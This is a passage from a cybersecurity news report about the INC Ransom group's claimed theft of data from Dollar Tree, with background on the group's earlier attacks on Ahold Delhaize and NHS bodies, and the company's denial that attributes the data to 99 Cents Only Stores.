The group targets a broad range of industries, including healthcare, education, and industrial sectors, with a primary focus on the United States and Europe. It has been linked to several high-profile attacks, including a major ransomware incident involving **Ahold Delhaize**, the parent company of Albert Heijn, where 6 terabytes of data were stolen. While INC Ransom is suspected to have ties to Russia, its exact origins remain unclear.

INC Ransom also made headlines **in December 2024** for targeting the UK’s National Health Service (NHS). The group stole patient data and caused service disruptions at multiple institutions, including Alder Hey Children’s, Liverpool Heart and Chest NHS Foundation Trusts, and Wirral University Teaching Hospital.

**In March 2024**, INC Ransomware also targeted NHS Scotland, stealing 3TB of data and threatening to leak it online if their ransom demands weren’t met. Reports **indicate** that the group has demanded ransoms exceeding $5 million in some cases.

INC Ransom is especially known for its double-extortion tactics, where they not only encrypt a victim’s data but also exfiltrate it, threatening to publish it online if the ransom isn’t paid. The group has also **rebranded** itself as Lynx, continuing its operations with the same double-extortion tactics and targeting crucial sectors in the US and UK.

****Another Day, Another Ransomware****

Ransomware attacks continue to surge. Just last week, NASCAR **confirmed** a data breach after Medusa ransomware claimed **responsibility** and demanded a $4 million ransom. On July 28, 2025, the GLOBAL GROUP ransomware gang claimed to have breached Miami-based media giant Albavisión, stealing 400GB of data.

Nevertheless, ransomware attacks like the one claimed against Dollar Tree show just how aggressive cybersecurity threats have become. With major companies and public institutions constantly under attack, the need for proper security measures has never been more urgent.

****Update – Company Response****

After the publication of this report, a spokesperson for Dollar Tree responded to Hackread.com. Although INC Ransomware has explicitly named Dollar Tree in its leak site listing and claimed to have stolen 1.2TB of sensitive data, the company denies any involvement.

While the ransomware group attributes the data leak to Dollar Tree, the company maintains that the data likely originated from 99 Cents Only Stores, a separate business from which it acquired only select real estate leases. In a statement shared with Hackread.com, Dollar Tree clarified:

> “We are aware of claims made by a ransomware group regarding 99 Cents Only Stores. The files referenced in these claims appear to involve former 99 Cents Only employees. Dollar Tree’s involvement with 99 Cents Only Stores is related to the purchase of select real estate lease rights following their closure. We did not acquire their corporate entity, systems/network, or data. Any allegation of Dollar Tree’s involvement is inaccurate.”
> 
> Dollar Tree Spokesperson

Hackread.com is monitoring the situation and will update the article if more information becomes available or if the ransomware group releases additional data that confirms or contradicts the claim.

Source

HackRead